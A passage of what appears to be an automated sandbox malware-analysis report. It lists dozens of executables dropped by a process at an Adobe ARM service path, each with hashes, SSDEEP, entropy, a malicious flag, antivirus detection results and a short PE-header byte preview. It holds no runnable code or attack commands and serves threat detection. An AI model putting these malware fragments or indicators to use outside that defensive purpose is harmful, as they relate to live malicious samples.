                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... .....r........................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):105669632
                                                                                                                                                                              Entropy (8bit):7.999988662877057
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:3145728:KLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:oBWx/pt8U7E6aZRfIICU
                                                                                                                                                                              MD5:A7088D2F1E3A123C2303F66BE53D7FAB
                                                                                                                                                                              SHA1:19F5AEB48CB7AAED5B59801746502FB5090153B7
                                                                                                                                                                              SHA-256:6DE7265CC7E4B7849864A2300EC0676B8C76A429FCEE96B5A5A821AC477BA428
                                                                                                                                                                              SHA-512:E094454D9A09D07B7ACAFEE2D91B6DCFBD5B46B343896ECB4CB02662B0093C073F0533BDCD5E9D468A6082FC5C2A508FBAA48884D29A2138E5BBA9C00E79C616
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1313792
                                                                                                                                                                              Entropy (8bit):4.567754203403392
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:IJiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:IV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:961C9E0A666992043A5CD1DE4609A6C9
                                                                                                                                                                              SHA1:840818A0F30EC387A50F2D576A24661B7EB32561
                                                                                                                                                                              SHA-256:5DB5512E00D7BEF6FDEA15E9AEC3475ED5C27B09B46B6635EBDF317FEE08C62C
                                                                                                                                                                              SHA-512:5466E95B9FEA264CE25B5741188F0890CEF7BDD6D7D801BC0B8F10CA4F134DB39049ACC00DCC01962F6435C02939861BF095D03DDE44EE6EA2D213EF658DBBB3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@..................................J......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.528877457721958
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:E2siJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:dW/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:35258FEFB2E303A0D201EF72DDA3A4A6
                                                                                                                                                                              SHA1:02030DB9ECA3863F9703520DF237C2C653B897F0
                                                                                                                                                                              SHA-256:E6AA029E23356B100BA7E3148F0CC72A46E2209BE641412DF562F6A87D9210D6
                                                                                                                                                                              SHA-512:271BF41E6BFB68E86ABB72BA0D0DC61B6B1CBA2C987C74E1C8DB9C947BFCEC72BEFDCD613A91E92B768AD1587AC6E46DE3D53C9AB3F4DA40E3E6728F85D540B3
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.9949149928982655
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:EpwOtO7z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EmOtmzLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:51B97218FB8B0873831EA7CCD8AE7933
                                                                                                                                                                              SHA1:922A24CDEC6FC81AD043395CA1AC4E6C0A888353
                                                                                                                                                                              SHA-256:403DBCBADA3B78249EFBFE2F8C1BEA631925E96B72CF4722990A837212849DFE
                                                                                                                                                                              SHA-512:6DEB02C19C4EA9177DA682E00C24661D20B1499AC0C937817432A95AF29553B8B6A100FBF725144BFDECC666435E8A608DBAB3232A59A43F1105E8BED41349EE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1368064
                                                                                                                                                                              Entropy (8bit):4.635835347853591
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:w1C/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:w8LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:38FB01419B8C772FB58832012F5214CF
                                                                                                                                                                              SHA1:200C315038180F3F05BA2FC8F2035726694420D8
                                                                                                                                                                              SHA-256:A4DD391E3E8177AE222B62861F6216E9595274AB52420DE02683AEA67896CD9F
                                                                                                                                                                              SHA-512:B279D2B5D6C5C556B3CC96058A0918CD20BA553FBBDD909F5D969804D3C1CE82A07D79DAD49E645E43863B4E6D3AFA4859B103767DC99D906CC4031D72D18DBB
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.................................MR......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.9956057804374785
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:xKU/h/4KI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xr/VILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:2275457420EFE79733AF3FA13F58A5D8
                                                                                                                                                                              SHA1:4EAE19A72734CDBD7E6348D5FBBEAAFB6AE1BDFF
                                                                                                                                                                              SHA-256:99A652CE39B0216F8E93801A5C54213BA68D909D223CC5FCCD93656A012F0D3F
                                                                                                                                                                              SHA-512:6C6B260D334A9F03E2B59D334112F978C2C0DA54D752A49EC5D6E9901DB8A3041DB8D57F5BDBF6B830123A93A8A5568E5D064866A5F6F07B446DBD21EFD63908
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1669632
Entropy (8bit):5.069214998668617
Encrypted:false
SSDEEP:24576:3x7YiBLZ05jNTmJWExn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3xUiHIjNgnLNiXicJFFRGNzj3
MD5:063EC1E1AF1B075FA8B6D0940D3F931B
SHA1:DA318EC9B8F473390EEA290B597BBE74158BF928
SHA-256:44EBB98B729135CFEF8B2CF933AF3069C9E794CA5F207A73A8C6CA75B28FD6D0
SHA-512:54E10DFF014D2DBBF0DA6388EDD07B1CEBA03C2083A9CD74E8987C53EABF5A8C17255CB60A6373FB26CD71824E523E622BAB034DBF786F21AB31D53618D078F4
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.529315567714302
Encrypted:false
SSDEEP:12288:qor8iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:VC/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:73C9A3C30CC13E6F517D84DB5BEFEAA4
SHA1:BCD806EB9542949E90A732C13E603CFDFCE917BF
SHA-256:96C1CDAEF18D87F329093C46BE91FEC9BCB131C7F0552ECE9FF60EDA7624E967
SHA-512:30374EC878C42409057B2F1DB5ACB52F5EA821592F86B4B717A7CAD6468CBACC1A3F378D9EE2E0D95B850F03233E3FDDE202587B847FDA20D5F1859DD627951B
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................?........................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1397760
Entropy (8bit):4.695195579087999
Encrypted:false
SSDEEP:24576:IdP/J/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ABLNiXicJFFRGNzj3
MD5:F65B07104911B03B0F2B6BD5902F2956
SHA1:21B3C217D74A2109B50E9A02FE858E4FC2B4B0FD
SHA-256:81824C90AC8DEA18E364D9BEDDD380060B2B86A82F779069E2A35822DF588592
SHA-512:8BB602D649BD040417A506E5E659F4C8CC2F1028157F44C6817B0256B4B6093AD9F8492C17E5314C44CE89AE448FB9C1A1C53A5105226EFD5ED5784A43D21501
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` ................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.529337100591426
Encrypted:false
SSDEEP:12288:kZ5EiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:ao/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:D893B479F41692CD885ADBFA38593888
SHA1:2E527DBB88D83D717B17CC4B030103D304F41367
SHA-256:CC0B4FB6EAC38BDF8DCEF0E51119360F37DEF354E38E3866707619FEB9D83AAB
SHA-512:1F9D35409E38D731A687FCD09076B628618C7D5B9FD44B0FB7DA18D58E839AFD0F32C9109297240A1495DE9A25C64A8DBB017C8634DD1277694FF830046A3F73
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.52939263940427
Encrypted:false
SSDEEP:12288:mZlsiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:0k/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:F98EA5CD4356E287138D044BE405D796
SHA1:E81701EFB0CEEB11736EDB48AE15DB16FF3872EB
SHA-256:DBE6F7A9A21EC41FD53769966A8592369EB505999A4F66CE793987D67D427515
SHA-512:190A5FDEB63BF121512FC9F17776254C3CE6721BE8E60499AD7519DFCFB1ACA14A78FE312B2B6A011DF5DFED6D6FE2BAE3D6979D9F55839AA85D064A53F072AA
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.529403200404629
Encrypted:false
SSDEEP:12288:yNlsiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Ek/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:BCBA6E8195A32E265C58682F7CC25F11
SHA1:350D86F0FA399997476818EF02E89EEDEC4EF263
SHA-256:46E296A1D1EC74E70CAF35DD911115EB18785F4A30CBDCD2104D663E437DAC9A
SHA-512:BE8408E649D2273CDD4DB1AF3528B2CBB71FD245BB055B9A08DE93D91F81BB55BB779C9AE6EA96CC021D92D1BB88668F61224132E31D399CAE74F44EC305CF54
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................H.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.529374096652101
Encrypted:false
SSDEEP:12288:AmmMiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:3v/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:9A035E37D3F446D10F2D06C7007309F1
SHA1:26128B7F49BC8E07F399024F4A77166E32720DF0
SHA-256:A3FC2556F3DF39D7BA59998E92A1137F7DC91A6492F6A71E6C3DC788DE2DF458
SHA-512:5D3C605D9A00AC48AA555E09739EA58CAEB17DC37B731CDF0D59BBB2BD8DFE2E92775C5BFA4BFF8798906C12A41446312F338CF9B7DC9681A7B1AF480B52597A
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................Lz.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.530218020253746
Encrypted:false
SSDEEP:12288:nnmwiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:nT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:D4A73F30030BDC00B42155F50478221C
SHA1:0CA17D6DE3D3A6BDA5A45C2948A9627FC4C74C72
SHA-256:F426F0BC101BA134F6D59C398DBB8DF83DF6A86A9B613985D6B8EFA5E2D9B951
SHA-512:9FAB993F036CCB54437B8DD3AB83FEB0E1319A31040C7D33A5EA943A4B4CBCA937DD92E83D7A792301D35FFCC84CFA2ABAE70BE78E54A2F528E5D0F81F853C50
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1297920
Entropy (8bit):4.529357666425191
Encrypted:false
SSDEEP:12288:PT5EiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:7g/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:DE85AC430B6A6092980107049E5DE533
SHA1:832D78B8BB3FE124198CDEF9162196DE590DC837
SHA-256:DBBFF4E80494075AAE7B2A2F3B7C2E6BFA7AB563A27E6E97493FBB875EE44067
SHA-512:04757DE3E0DCB1D2E4FF71BC15FEADBD4FD13CC1E41FDA147E2B80EB651461CB237537E9C290D8D2007DCF608834DE47E7D305651460B9D17C8F1F5004E64DE8
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................j........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529391543572566
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:qw/siJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:je/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:30539970DFF430CEC3C95636B3284B24
                                                                                                                                                                              SHA1:DD7F1DB3E60DAF5D2E2395702C0F5BB918F28ACC
                                                                                                                                                                              SHA-256:9101F5F209C81509C2EDD19CA34511A8CF8C5F356D9C9BE7735A3306DFBCD458
                                                                                                                                                                              SHA-512:58488FD5A886F805442273CCB962CCBAEDC0B82664AF89FB9713B5A37FCD198A1140034995125C40976323A1B6066F911949F0CDE48538F047B0CE27B935C019
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529297417814367
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:TAmciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:kv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:DB28A939365C2C4C4B6AEDA172902D89
                                                                                                                                                                              SHA1:59AFBBF435A47AB264C77355EDB9DD17B2D7F03F
                                                                                                                                                                              SHA-256:7500DFC9733F113596B6FAA20826B03815F94902573BD7264AF5395E62144BC9
                                                                                                                                                                              SHA-512:1376A0B6B4387B0EC289AA8241773DA917737ED84974AFD493555FECD93AFF9E0A7E9353A6BA8114865CC43F176BBC3E55DD90CD57846CC4D9D63BED2FAC3F5A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................J.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.5293510690708665
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:F1SkiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:X7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:F1966D1D86AEE9A484738BF0FEEA06DF
                                                                                                                                                                              SHA1:A399371597A8F7785EFB4E9A3EA0E88CA212A7B7
                                                                                                                                                                              SHA-256:677C26954A386C2055776DF46FA56E77ABF0DC02B6D312980C98A7CCCFB73D27
                                                                                                                                                                              SHA-512:9F2BF6B91FEF8D8E91F6A0F32F9524C95C66037AEE0990C72F56824BDF8BCACA8B06769A446FC58E921C331E1E73187858C23A6FC3B851511B9B71A17864502F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1297920
                                                                                                                                                                              Entropy (8bit):4.529403094588803
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:zU/siJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:4e/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:F8117B49BEFEE0A9286FBD45C1C1C250
                                                                                                                                                                              SHA1:04CDDB9A62A1CA601321DA3F092D7B3BCF3AB9A1
                                                                                                                                                                              SHA-256:67C49E88745BBAD67053F886665A500643704956EFA8E559BA89DC788EBF5967
                                                                                                                                                                              SHA-512:433372A2EAD4CAC19125DC73E666C505F826255FA793414DEA6FD36CE5D0469CD29ED84BAD40AF7D2BEAA329CE6A0147C11C6ACD6F60FD6E2619B3CF25319F2C
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1358336
                                                                                                                                                                              Entropy (8bit):4.612118388953632
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:OEA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OjLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:9045F0A40527CCBE255EBDC8CEA12EFD
                                                                                                                                                                              SHA1:757A9D53ECACE96B5607054F39FA262FD2E8A200
                                                                                                                                                                              SHA-256:BFB3F96C5B4556F2FC648F3AA4B5A36AED735514AE4ECEF3E4EE1D519EDD0C83
                                                                                                                                                                              SHA-512:6DAEB8CFB798D100E5FB6B4D23189496784733E28D973182B9239F6BB4179D4AE7018C2674CB6EA427734BD45A452FC4EFEA98C22F6DBFADC06A320F41BB2D99
                                                                                                                                                                              Malicious:true
